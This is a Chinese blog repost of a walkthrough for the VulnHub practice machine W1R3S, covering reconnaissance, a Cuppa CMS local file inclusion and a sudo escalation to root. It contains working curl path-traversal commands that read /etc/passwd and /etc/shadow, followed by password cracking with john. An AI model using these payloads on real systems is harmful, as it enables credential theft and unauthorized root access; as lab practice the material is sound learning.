vulnhub靶机实战——W1R3S

最新推荐文章于 2024-05-11 04:44:03 发布
最新推荐文章于 2024-05-11 04:44:03 发布
阅读量384 收藏
点赞数
原文链接:http://www.cnblogs.com/Aasion/p/10859018.html
版权

环境

 

靶机ip:192.168.163.132

攻击机ip:192.168.163.129

目的:拿下靶机并获得root权限

 

渗透

首先nmap扫描端口

nmap -sC -sV 192.168.163.132

可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。

首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有没有可利用的文件。

各种文件夹翻了一遍并没有什么东西,找的时候发现两串hash,解密hash内容一个是这不是密码,另一个是告诉我们没有这么简单(心疼解密时花的一块钱),放弃ftp

访问80,是apache的默认页面,没什么发现。

使用gobuster扫目录

这个时候我们发现了两个有趣的目录

/wordpress和/administrator

访问了wordpress,也是没什么东西。

于是访问/administrator,发现cms是cuppa

 果断找这个cms的漏洞,只有一个先下载下来看看

看到这个cms存在lfi漏洞,根据txt中的内容进行构造url

http://192.168.163.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在浏览器中输入上面的URL,页面没有任何返回。
尝试使用curl命令,对参数urlconfig的参数进行urlencode
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.163.132/administrator/alerts/alertConfigField.php 
成功显示,修改命令为
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow  http://192.168.163.132/administrator/alerts/alertConfigField.php

把有密码的几个用户信息全部复制下来,放入pass.txt中

john pass.txt解出一个w1r3s的密码,ssh登陆

尝试root

命令行输入sudo -l(此处因为比较简单所以懒得截图了,凑活看吧)

w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL

 

这时我们看到,w1r3s用户可运行任何命令

sudo su即可切换到root

 ps:靶机比较简单,写这个文章只是为了记录一下,仅此而已。

转载于:https://www.cnblogs.com/Aasion/p/10859018.html

weixin_30294295
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
5-VulnHub-W1R3S
尼德霍格007
07-11 249
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 可以看到开放以下几个端口了 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先访问FTP,匿名访问不需要密码 content目录 一个一个打开看看,在01.txt中获得提示 02.txt ba
Linux sudo权限提升漏洞复现(CVE-2021-3156)
reaido的博客
02-02 550
一、背景 sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。 二、特性 § sudo能够限制用户只在某台主机上运行某些命令。 § sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。 § sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且
2024年最全【打靶记录】VulnHub-stapler靶机渗透wp,2024年最新学习指南
2401_84519960的博客
05-11 641
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。攻击机:Kali Linux IP:192.168.47.129目标:获得root权限且找到flag.txt。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2007
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
2021年1月2日-VulnHub-W1R3S 渗透学习
AnonyMousIT的博客
01-02 319
VulnHub-W1R3S 渗透学习 靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/ kali地址:192.168.31.77 靶机IP地址:192.168.31.11 一、信息收集 使用dirb 爆破目录 curl是一个命令行工具,可用于在网络上传输数据。 它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。 在调试网络请求时,curl是您可以找到的最佳工具之一。 curl使用
w1r3s--靶机实操详解
qq_61802750的博客
08-05 413
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 993
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8783
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1912
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1187
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2850
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2139
Vulnhub DC-1、DC-2靶机通关手册
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub
Bossfrank的博客
05-30 3250
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
靶机精讲之 W1R3S
m0_63285023的博客
04-04 502
New FTP Server For W1R3S.inc 记到笔记上(文本上因为到时候要用到)anonymous匿名登录,如果可以匿名登录则说明是没有密码的。查看文件2的编码形式 指令:hash-indentifier。-sT 说明用tcp协议(三次握手)扫描。把这段码保存下来(破解),像hash码。21,23,80,3306端口 +ip。把cuppa去掉,试一下,存在登录界面。zh注册尝试一下,有可能有注入漏洞。扫描到的目录要一个个查看(大致)可能存在编码问题(被包含文件)
sudo: unable to resolve host 342140129wwy: Temporary failure in name resolution
最新发布
05-30
当您在使用sudo命令时,出现"unable to resolve host"这个错误信息,通常是由于您的主机名(hostname)未被正确解析导致的。主机名是您计算机的标识符,它通常以某种方式与IP地址相关联。出现这种错误时,您需要检查您的主机名是否正确设置,并确保它已被正确解析。此外,您还可以通过编辑/etc/hosts文件来手动添加解析记录,以便sudo命令正常工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值